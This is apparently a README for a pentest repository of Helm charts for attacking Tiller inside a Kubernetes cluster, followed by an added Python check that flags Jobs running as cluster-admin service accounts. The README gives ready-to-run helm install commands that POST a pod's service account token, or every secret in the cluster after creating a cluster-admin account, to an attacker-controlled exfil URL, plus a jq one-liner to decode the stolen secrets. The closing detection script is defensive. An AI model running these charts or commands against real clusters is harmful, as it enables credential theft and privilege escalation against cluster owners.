About

These are a few Helm Charts I've made to help exfiltrate data or privesc when you're in a Kubernetes Cluster and have access to Tiller, but not to the Kubernetes API.

For more information, see my blogpost about attacking Tiller from inside a cluster: https://blog.ropnop.com/attacking-default-installs-of-helm-on-kubernetes/

Charts

To use these charts, first initialize Helm; you can then install the charts directly from the repo:

$ helm init --client-only
$ helm install --repo https://ropnop.github.io/pentest_charts/ <chart_name> [options]

exfil_sa

This chart deploys a job designed to simply POST the pod's service account token to a URL. This is useful if you have access to Tiller and know a specific service account whose token you'd like to steal. It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName=tiller --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh" --repo https://ropnop.github.io/pentest_charts exfil_sa_token

This will POST the token in the body of an HTTP request to exfilURL.

To clean up: helm delete --purge <release_name>

exfil_secrets

This chart creates a new service account with cluster-admin privileges, then deploys a job with that new service account to read all the secrets in every namespace from the Kubernetes API and POST the data back to an exfilURL.

It takes the following values:

  • name - the name of the release, job and pod.
  • serviceAccountName - the service account to use (and therefore the token that will be exfil'd)
  • exfilURL - the URL to POST the token to. Make sure you have a listener on that URL to catch it! (I like using a serverless function)
  • namespace - defaults to kube-system, but you can override it

Usage:

helm install --name tiller-deployer --set serviceAccountName="tiller-deployer" --set exfilURL="https://datadump-slack-dgjttxnxkc.now.sh/all_secrets.json" --repo https://ropnop.github.io/pentest_charts exfil_secrets

This will POST every Kubernetes secret in JSON form to the exfilURL. To parse through and quickly decode all the secrets, you can use jq:

cat all_secrets.json| jq '[.items[] | . as $secret| .data | to_entries[] | {namespace: $secret.metadata.namespace, name: $secret.metadata.name, type: $secret.type, created: $secret.metadata.creationTimestamp, key: .key, value: .value|@base64d}]'

To clean up: helm delete --purge <release_name>
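
A detection-side check for the pattern exfil_secrets leaves behind (a Job running as a service account bound to cluster-admin), as an added example that is not part of the original repository. It runs over constructed sample data shaped like `kubectl get clusterrolebindings -o json` and `kubectl get jobs --all-namespaces -o json`; the binding and job names in the sample, and both function names, are assumptions.

```python
# Constructed sample data shaped like `kubectl get clusterrolebindings -o json` and
# `kubectl get jobs --all-namespaces -o json`; all names are made up. Use json.load() on real output.
SAMPLE_BINDINGS = {"items": [
    {"metadata": {"name": "tiller-deployer-crb"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "tiller-deployer", "namespace": "kube-system"}]},
    {"metadata": {"name": "viewer-crb"},
     "roleRef": {"kind": "ClusterRole", "name": "view"},
     "subjects": [{"kind": "ServiceAccount", "name": "metrics", "namespace": "monitoring"}]},
    {"metadata": {"name": "admins"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "ops"}]},
]}
SAMPLE_JOBS = {"items": [
    {"metadata": {"name": "tiller-deployer", "namespace": "kube-system"},
     "spec": {"template": {"spec": {"serviceAccountName": "tiller-deployer"}}}},
    {"metadata": {"name": "nightly-report", "namespace": "monitoring"},
     "spec": {"template": {"spec": {"serviceAccountName": "metrics"}}}},
    {"metadata": {"name": "db-migrate", "namespace": "default"},
     "spec": {"template": {"spec": {}}}},
]}

def cluster_admin_service_accounts(bindings):
    """Return {(namespace, name): binding_name} for service accounts bound to cluster-admin."""
    found = {}
    for b in bindings.get("items", []):
        ref = b.get("roleRef", {})
        if ref.get("kind") != "ClusterRole" or ref.get("name") != "cluster-admin":
            continue
        for s in b.get("subjects") or []:  # subjects may be absent or null
            if s.get("kind") == "ServiceAccount":
                found[(s.get("namespace"), s["name"])] = b["metadata"]["name"]
    return found

def jobs_running_as_cluster_admin(jobs, bindings):
    """Return (namespace, job, service account, binding) for each Job that needs review."""
    admins = cluster_admin_service_accounts(bindings)
    hits = []
    for j in jobs.get("items", []):
        ns = j["metadata"]["namespace"]
        # A pod spec without serviceAccountName runs as the namespace's "default" account.
        sa = j["spec"]["template"]["spec"].get("serviceAccountName", "default")
        if (ns, sa) in admins:
            hits.append((ns, j["metadata"]["name"], sa, admins[(ns, sa)]))
    return hits

if __name__ == "__main__":
    for hit in jobs_running_as_cluster_admin(SAMPLE_JOBS, SAMPLE_BINDINGS):
        print("REVIEW: job %s/%s runs as %s (bound by %s)" % hit)
```

Only ClusterRoleBindings are considered here; a namespaced RoleBinding that references cluster-admin grants admin rights in that namespace only and would need a separate pass.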